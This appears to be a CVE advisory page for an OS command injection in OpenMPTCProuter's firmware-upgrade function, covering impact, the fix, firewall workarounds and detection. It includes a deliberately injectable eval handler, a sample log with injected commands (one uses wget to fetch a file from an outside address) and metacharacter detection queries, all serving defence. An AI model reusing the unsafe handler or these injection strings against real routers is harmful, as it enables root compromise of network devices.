CVE-2025-65882

9.8 CRITICAL

📋 TL;DR

OpenMPTCProuter through version 0.64 does not neutralize shell metacharacters in input that its sysupgrade (firmware upgrade) functionality passes into an OS command (CWE-78, OS command injection). An attacker who can reach that functionality, which normally means an authenticated management session, can write arbitrary files or run arbitrary commands on the router. Because OpenMPTCProuter is OpenWrt-based and its management stack runs as root, successful exploitation gives full control of the device.
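As an added illustration of the bug class, not OpenMPTCProuter's own code and not the exact vulnerable path (which this page does not show): a POSIX sh handler that builds a sysupgrade command line from a caller-supplied image path, first in the injectable form and then hardened. The SYSUPGRADE variable and both function names are assumptions made for the example; set SYSUPGRADE=echo to see what each variant would execute without flashing anything.

```shell
#!/bin/sh
# Added example, not OpenMPTCProuter's own code. The program that runs is
# taken from $SYSUPGRADE so the example can be exercised safely, e.g.
#   SYSUPGRADE=echo; flash_image_unsafe '/tmp/fw.bin; id'
SYSUPGRADE=${SYSUPGRADE:-/sbin/sysupgrade}

# Vulnerable: the caller's string is spliced into a command line that the
# shell parses again, so ';', '|', '`' and '$(...)' in it become new commands.
flash_image_unsafe() {
    image=$1
    eval "$SYSUPGRADE -n $image"
}

# Hardened: accept only a plain path under /tmp built from a small character
# set, then pass it as one quoted argument. Nothing re-parses the string, so
# metacharacters would be inert, and the allow-list rejects them anyway.
flash_image_safe() {
    image=$1
    case $image in
        /tmp/*) ;;
        *) echo "rejected: image must live under /tmp" >&2; return 2 ;;
    esac
    case $image in
        *[!A-Za-z0-9._/-]*) echo "rejected: unexpected character in image path" >&2; return 2 ;;
    esac
    case $image in
        *..*) echo "rejected: path traversal" >&2; return 2 ;;
    esac
    "$SYSUPGRADE" -n "$image"
}
```

With SYSUPGRADE=echo, flash_image_unsafe '/tmp/fw.bin; echo INJECTED' prints the marker because the second command runs; flash_image_safe refuses the same string with exit status 2 and executes nothing. The hardened version deliberately does not try to escape or strip characters: an allow-list plus a single quoted argument is the only pattern that stays correct when the shell, the firmware tool and the web stack all change.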

💻 Affected Systems

Products:
  • openmptcprouter
Versions: up to and including 0.64
Operating Systems: OpenWrt-based router firmware (OpenMPTCProuter is built on OpenWrt)
Default Config Vulnerable: ⚠️ Yes
Notes: The flaw is in the sysupgrade (firmware upgrade) functionality of the management interface, which is reachable by authenticated users; a default installation is affected.

📦 What is this software?

OpenMPTCProuter is an OpenWrt-based router firmware that aggregates several Internet connections using Multipath TCP (MPTCP), with a companion server component on a VPS that terminates the tunnels. It is typically installed on a small router or x86 box that acts as the LAN's default gateway.
⚠️ Risk & Real-World Impact

🔴

Worst Case

Full compromise of the router: arbitrary commands run as root, the account under which OpenWrt's management stack already runs, so the attacker controls the firmware, the routing and every aggregated link the device terminates.

🟠

Likely Case

Arbitrary command execution by anyone who can reach the sysupgrade function with management credentials, used to install a persistent implant, pivot into the LAN behind the router, or disrupt the aggregated links.

🟢

If Mitigated

Exposure is reduced, not removed, when the web UI and SSH are reachable only from trusted hosts and management credentials are strong; until the fix is applied, any legitimate administrator session (including one obtained with stolen credentials) can still be abused.

🌐 Internet-Facing: HIGH - OpenMPTCProuter sits at the network edge as the default gateway. The exploitable surface is the management interface rather than the routing itself, so exposure is highest where the web UI or SSH has been opened on the WAN side.
🏢 Internal Only: MEDIUM - With management limited to the LAN, the flaw is exploitable by anyone on the internal network who obtains management credentials or hijacks an administrator's session.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

A proof of concept has been published as a GitHub gist. Exploitation requires access to the sysupgrade functionality, i.e. a management session on the router; no authentication bypass is part of this issue.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: fixed by commit 09393d1c41a227bea7d5b85c0a06221b1302b25f; builds that include it (versions after 0.64) are not affected

Vendor Advisory: https://github.com/Ysurac/openmptcprouter/commit/09393d1c41a227bea7d5b85c0a06221b1302b25f

Restart Required: Yes (a firmware sysupgrade reboots the device)

Instructions:

1. Update OpenMPTCProuter to a release newer than 0.64 that includes commit 09393d1c41a227bea7d5b85c0a06221b1302b25f, using an image obtained from the project.
2. If you build images yourself, confirm that commit is present in your source tree before building.
3. Reboot (automatic after sysupgrade) and verify the running version.

🔧 Temporary Workarounds

Disable sysupgrade functionality

There is no service to disable: OpenMPTCProuter is OpenWrt-based, has no systemd, and /sbin/sysupgrade is a shell script invoked on demand by the management interface. Removing its execute bit is the closest equivalent, but it blocks every firmware upgrade, including the one that delivers the fix, and it does not stop the injection if the crafted input is interpreted by a shell before sysupgrade itself runs. Treat it as a last resort and prefer restricting the management interface.

chmod -x /sbin/sysupgrade

Restrict access to management interface

The sysupgrade functionality is reached through the web UI (LuCI, TCP 80/443 by default) as well as over SSH, so a rule that only covers port 22 leaves the vulnerable path open. On builds that still use fw3/iptables, the following limits both to one trusted host (replace trusted_ip). Rules entered this way do not survive a reboot, and on fw4/nftables builds the iptables command is not installed by default; use the UCI firewall configuration instead.

iptables -I INPUT -p tcp -m multiport --dports 22,80,443 -s trusted_ip -j ACCEPT
iptables -I INPUT 2 -p tcp -m multiport --dports 22,80,443 -j DROP
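The same restriction expressed in OpenWrt's UCI firewall configuration, which OpenMPTCProuter inherits and which persists across reboots on both fw3 and fw4 builds. This is an added example, not the project's own code; it assumes the default zone name "lan", LuCI on TCP 80/443 and SSH on TCP 22, and uses a RUN prefix (set RUN=echo to print the commands instead of applying them).

```shell
#!/bin/sh
# Added example, not OpenMPTCProuter's own code: confine the web UI (LuCI on
# TCP 80/443) and SSH (TCP 22) to one trusted source with the UCI firewall
# configuration that OpenMPTCProuter inherits from OpenWrt. Assumptions: the
# zone is named "lan" (OpenWrt's default) and the ports are the defaults.
# RUN is a dry-run prefix: leave it empty to apply, set RUN=echo to print.
RUN=${RUN:-}

omr_restrict_mgmt() {
    trusted=$1                   # e.g. 192.168.100.10 or 192.168.100.0/24
    if [ -z "$trusted" ]; then
        echo "usage: omr_restrict_mgmt <ip-or-cidr>" >&2
        return 1
    fi
    # Named sections make the change idempotent: re-running rewrites the same
    # two rules instead of appending duplicates. The ACCEPT must come first;
    # fw3/fw4 evaluate rules in configuration order before the zone policy.
    $RUN uci set firewall.omr_mgmt_allow=rule
    $RUN uci set firewall.omr_mgmt_allow.name='Allow-mgmt-from-trusted'
    $RUN uci set firewall.omr_mgmt_allow.src='lan'
    $RUN uci set firewall.omr_mgmt_allow.src_ip="$trusted"
    $RUN uci set firewall.omr_mgmt_allow.proto='tcp'
    $RUN uci set firewall.omr_mgmt_allow.dest_port='22 80 443'
    $RUN uci set firewall.omr_mgmt_allow.target='ACCEPT'

    $RUN uci set firewall.omr_mgmt_deny=rule
    $RUN uci set firewall.omr_mgmt_deny.name='Reject-mgmt-from-others'
    $RUN uci set firewall.omr_mgmt_deny.src='lan'
    $RUN uci set firewall.omr_mgmt_deny.proto='tcp'
    $RUN uci set firewall.omr_mgmt_deny.dest_port='22 80 443'
    $RUN uci set firewall.omr_mgmt_deny.target='REJECT'

    $RUN uci commit firewall
    $RUN /etc/init.d/firewall reload
}
```

Run it from a session on the trusted host, because the REJECT rule cuts off the web UI and SSH for every other LAN address the moment the firewall reloads. Check as well that no WAN-facing zone carries option input ACCEPT (uci show firewall), since these two rules only cover the lan zone. The rules limit who can reach the interface; the injection itself remains until the fix is installed.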

🧯 If You Can't Patch

  • Keep the router's web UI and SSH reachable only from an administration host or network, never from the WAN side, and segment so that a compromised router cannot reach critical internal hosts directly
  • Forward the router's syslog to a collector and alert on firmware-upgrade activity, and on shell or download tools started by the web management stack, outside planned maintenance

🔍 How to Verify

Check if Vulnerable:

Any OpenMPTCProuter build at version 0.64 or earlier is vulnerable unless commit 09393d1c41a227bea7d5b85c0a06221b1302b25f has been applied to it. Compare the running version and the presence of that commit; there is no single file or function to inspect.

Check Version:

cat /etc/openmptcprouter-version || openmptcprouter --version

Verify Fix Applied:

The running version is newer than 0.64 (the version is also shown in the OpenMPTCProuter status page of the LuCI web interface), or, for self-built images, the source tree the image was built from contains commit 09393d1c41a227bea7d5b85c0a06221b1302b25f as an ancestor of the build's HEAD.

📡 Detection & Monitoring

Log Indicators:

OpenWrt keeps its log in a ring buffer (logread) that is lost on reboot; forward it to a collector (option log_ip in /etc/config/system) so the following survive a reboot or a hostile wipe:

  • Firmware-upgrade activity (sysupgrade messages, unexpected reboots) outside planned maintenance
  • Shell utilities such as sh, wget or curl started by the web management stack (uhttpd/rpcd) rather than by an interactive SSH session
  • New or modified files under /etc, /overlay or /tmp that no administrator action explains

Network Indicators:

  • Outbound connections originating from the router itself (not forwarded LAN traffic) to unfamiliar hosts, for example a download right after a management request
  • Web UI or SSH sessions from unexpected sources, particularly from the WAN side

SIEM Query:

Stock OpenWrt has no process auditing, so a process-based query only applies where a host agent or forwarded syslog supplies that data. Because /sbin/sysupgrade is a shell script, the injected command may be attributed to a process named sysupgrade or to its sh/ash interpreter depending on the sensor, so match both; on the request side, match URL-encoded metacharacters (%3B, %7C, %60, %24%28) as well as raw ones. Expect false positives from legitimate shell pipelines containing "|" and review hits rather than alerting blindly.

(process.name="sysupgrade" OR process.parent.name="sysupgrade" OR process.name="sh" OR process.name="ash") AND (process.cmdline="*;*" OR process.cmdline="*|*" OR process.cmdline="*`*" OR process.cmdline="*$(*")
url.path="*sysupgrade*" AND (url.query="*;*" OR url.query="*%3B*" OR url.query="*|*" OR url.query="*%7C*" OR url.query="*`*" OR url.query="*%60*" OR url.query="*$(*" OR url.query="*%24%28*")
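The request-side logic above, run over sample log lines, as an added example that is not part of this advisory or of the OpenMPTCProuter project. It assumes syslog text forwarded from the router in which the web stack records the request line and query; that format, the request path and every address in the sample are constructed for the example (OpenWrt's uhttpd does not write such a line on its own).

```shell
#!/bin/sh
# Added example, not OpenMPTCProuter's own code: flag management requests
# that name the sysupgrade function and carry shell metacharacters, raw or
# URL-encoded. The log format and request path below are constructed for
# this example, as is every address in it.

# Matches ; | ` $( and a newline, plus their percent-encoded forms.
SHELL_META='[;|`]|\$\(|%3[bB]|%7[cC]|%60|%24%28|%0[aA]'

# Reads log lines on stdin, prints those worth an analyst's attention.
scan_sysupgrade_requests() {
    grep -i 'sysupgrade' | grep -iE "$SHELL_META"
}

# Constructed sample: one legitimate upgrade, one raw injection, one encoded
# injection, a decoy with a pipe in an unrelated request, and a plain GET.
SAMPLE_LOG='Nov 21 10:01:02 omr daemon.info uhttpd[1234]: 192.168.100.10 POST /cgi-bin/luci/admin/system/sysupgrade image=/tmp/omr-0.65.img
Nov 21 10:03:41 omr daemon.info uhttpd[1234]: 192.168.100.77 POST /cgi-bin/luci/admin/system/sysupgrade image=/tmp/x.img;wget http://203.0.113.5/a -O /tmp/a
Nov 21 10:04:12 omr daemon.info uhttpd[1234]: 203.0.113.5 POST /cgi-bin/luci/admin/system/sysupgrade image=x.img%3Bsh%20-c%20%24%28id%29
Nov 21 10:05:00 omr daemon.info uhttpd[1234]: 192.168.100.10 GET /cgi-bin/luci/admin/status/realtime/bandwidth?iface=eth0|br-lan
Nov 21 10:06:30 omr daemon.info uhttpd[1234]: 192.168.100.10 GET /cgi-bin/luci/admin/system/sysupgrade'

# Usage: printf '%s\n' "$SAMPLE_LOG" | scan_sysupgrade_requests
# or on a live collector: tail -f /var/log/router.log | scan_sysupgrade_requests
```

On the sample only the two injection lines are reported: the pipe in the bandwidth request is ignored because that request never touches sysupgrade, and the legitimate upgrade carries no metacharacters. The encoded line is the one a raw-character query such as the page's SIEM example would miss.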

🔗 References
